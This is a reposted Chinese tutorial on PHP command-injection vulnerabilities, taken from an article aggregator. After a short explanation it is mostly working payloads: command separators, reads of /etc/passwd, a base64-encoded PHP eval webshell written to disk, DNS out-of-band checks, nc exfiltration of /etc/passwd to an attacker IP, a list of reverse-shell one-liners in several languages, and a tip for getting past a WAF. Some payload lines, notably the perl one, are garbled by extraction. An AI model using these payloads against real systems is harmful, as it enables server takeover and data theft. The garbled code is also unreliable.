【网络安全】命令执行漏洞

这篇具有很好参考价值的文章主要介绍了【网络安全】命令执行漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

命令执行漏洞原理

应用程序中有时候需要调用一些执行系统命令的函数,在php中常见的为systemexecshell_execpassthruproc_poenpopen等函数用来执行系统命令。当黑客能控制这些函数的参数时,就可以讲恶意的系统命令拼接到正常的命令中,就会命令执行攻击,这就是命令执行漏洞。

危害

  1. 继承web服务器的权限执行系统命令
  2. 继承web服务器程序权限,读写文件
  3. 反弹shell
  4. 控制整个网站
  5. 控制整个服务器

检测方法

有回显检测方法

常用方法:

; (分号) 从左到右执行

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

| (管道符) 将见面命令的输入为后面命令的标准输入

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

&(后台任务符号) 命令从左到右执行

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

&&(与) 逻辑与,前面命令执行成功后才会执行

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

||(或) 逻辑或,前面执行失败才能执行

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

`(反引号)当命令解析时,首先执行反引号之间的操作

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

$(命令替换符)与反应号功能一样

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

有回显常用判断方式

win 操作系统
type c:\windows\win.ini
linux 操作系统
cat /etc/passwd

无回显且有写入权限
  1. 传webshell到服务器中
|echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk/Pg=="|base64 -d >shell.php  #base64解码后写入到shell.php文件中

命令执行漏洞挖掘,网络安全,web安全,安全,服务器
命令执行漏洞挖掘,网络安全,web安全,安全,服务器

  1. 查看是否可以访问
    命令执行漏洞挖掘,网络安全,web安全,安全,服务器

  2. 使用webshell工具连接
    命令执行漏洞挖掘,网络安全,web安全,安全,服务器
    命令执行漏洞挖掘,网络安全,web安全,安全,服务器

无回显利用dnslog平台检测

借助dnslog.cn查看访问
链接: http://dnslog.cn/
命令执行漏洞挖掘,网络安全,web安全,安全,服务器

  1. 访问dnslog平台生成的域名
`whoami`.7w1v2u.dnslog.cn
  1. 查看dnslog平台是否有访问信息
    命令执行漏洞挖掘,网络安全,web安全,安全,服务器
无回显利用bp检测

利用原理与dnslog是一样的

  1. 找到bp相关模块

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

  1. 复制dns地址
    命令执行漏洞挖掘,网络安全,web安全,安全,服务器

  2. 访问此地址

|ping -c 4 m1odth5coly60euvoihemfn5kwqnec.burpcollaborator.net
  1. 刷新bp查看结果
    命令执行漏洞挖掘,网络安全,web安全,安全,服务器
无回显利用netcat命令检测
  1. 使用kali监听9999端口

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

  1. 漏洞位置输入命令
|nc 192.168.0.107 9999 </etc/passwd
  1. 查看kali生成的文件信息

命令执行漏洞挖掘,网络安全,web安全,安全,服务器

命令执行漏洞nc反弹shell

  1. 使用kali监听
nc -vlnp 8080
  1. 漏洞位置执行命令
|/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/8080 0>&1'

命令执行漏洞挖掘,网络安全,web安全,安全,服务器
命令执行漏洞挖掘,网络安全,web安全,安全,服务器

常用的shell反弹命令:

bash shell 执行
||/bin/bash -c ‘bash -i >& /dev/tcp/192.168.0.124/8080 0>&1’
perl -e ‘use
Socket; i = " 10.0.0.1 " ; i="10.0.0.1"; i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(
“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,“>&S”);open(STD
OUT,“>&S”);open(STDERR,“>&S”);exec(“/bin/sh -i”);};’
python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.co
nnect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’
php -r ‘$sock=fsockopen(“10.0.0.1”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’
ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1”,1234).to_i;exec sprintf(“/bin/sh -i
<&%d >&%d 2>&%d”,f,f,f)’
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,“-c”,“exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line;
do $line 2>&5 >&5; done”] as String[])
p.waitFor()

tips: 如果遇到waf连接可以把语句进行base64加密后输入文章来源地址https://www.toymoban.com/news/detail-772277.html

到了这里,关于【网络安全】命令执行漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Web网络安全-----Log4j高危漏洞原理及修复

    Web网络安全-----红蓝攻防之信息收集 Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;

    2024年02月10日
    浏览(53)
  • [CSAW/网络安全] Git泄露+命令执行 攻防世界 mfw 解题详析

    Home界面: Home界面翻译如下: 欢迎访问我的网站! 我自己从头开始写的! 您可以使用上面的链接浏览页面! About界面: 观察到 Git ,联想 Git泄露 Git是一个非常流行的开源分布式版本控制系统,它被广泛用于协同开发和代码管理。许多网站和应用程序都使用Git作为其代码管

    2024年02月06日
    浏览(56)
  • RCE远程命令执行漏洞挖掘思路

    1.URL上 在 url参数上 ,不仅仅可能存在ssrf漏洞,也有很大概率存在命令执行,很大可能调用系统命令如curl。 payload例子: index.php?id=2;}phpinfo();/* ttp://www.xxx.com/cmd.php?cmd=phpinfo() 比如访问到如下URL,在jsp后面尝试加参数,比如path(什么参数需要试)     http://x.x.x.x:28076/file/dirF

    2024年02月01日
    浏览(57)
  • 网络安全全栈培训笔记(WEB攻防-51-WEB攻防-通用漏洞&验证码识别&复用&调用&找回密码重定向&状态值)

    知识点: 1、找回密码逻辑机制-回显验证码指向 2、验证码验证安全机制-爆破复用识别 3、找回密码客户端回显Response状态值修改重定向 4、验证码技术验证码爆破,验证码复用,验证码识别等 详细点: 找回密码流程安全: 1、用回显状态判断-res前端判断不安全 2、用用户名重

    2024年01月16日
    浏览(63)
  • 网络安全全栈培训笔记(53-WEB攻防-通用漏洞&CRLF注入&URL重定向&资源处理拒绝服务)

    知识点: 1、CRLF注入-原理检测利用 2、URL重定向-原理检测利用 3、Web拒绝服务-原理检测利用 #下节预告: 1、JSONPCORS跨域 2、域名安全接管劫持 #详细点: 1.CRLF注入漏洞,是因为Wb应用没有对用户输入做严格验证,导致攻击者可以输入一些 恶意字符。攻击者一旦向清求行或首部

    2024年01月15日
    浏览(56)
  • [网络安全]一文带你了解SSTI漏洞(结合Web_python_template_injection解题详析)

    SSTI是Server-Side Template Injection的缩写,是一种Web应用程序安全漏洞,主要存在于使用基于模板引擎的Web应用程序中。 SSTI漏洞的主要原因是 在Web应用程序中使用了基于模板引擎的渲染功能,并且没有正确地验证和过滤用户输入的数据。当攻击者能够构造特定的输入并成功地注入

    2024年02月08日
    浏览(45)
  • 【Web安全】小白怎么快速挖到第一个漏洞,src漏洞挖掘经验分享,绝对干货!

    src漏洞挖掘经验分享 – 掌控安全以恒 一、公益src 公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。 在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好

    2024年02月13日
    浏览(75)
  • 【网络安全】JWT安全漏洞

    Json Web Token(JWT) JSON Web Token(JWT)是一个非常轻巧的规范。这个规范允许我们使用JWT在两个组织之间传递安全可靠的信息。 JWT是一个有着简单的统一表达形式的字符串: 头部(Header) 头部用于描述关于该JWT的最基本的信息,例如其类型以及签名所用的算法等。 JSON内容要经

    2024年02月12日
    浏览(36)
  • 多个安全厂商安全设备 远程命令执行漏洞复现

    此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 该漏洞可执行远程代码 FOFA:body=“/webui/images/default/default/alert_close.jpg”

    2024年02月03日
    浏览(47)
  • 【网络安全】Xss漏洞

    定义: XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为 XSS,XSS 是一种在 web 应用中的计算机安全漏洞,它允许恶意 web 用户将代码植入到 web 网站里面,供给其它用户访问,当用户访问到有恶意代码的网页就会产生

    2023年04月20日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包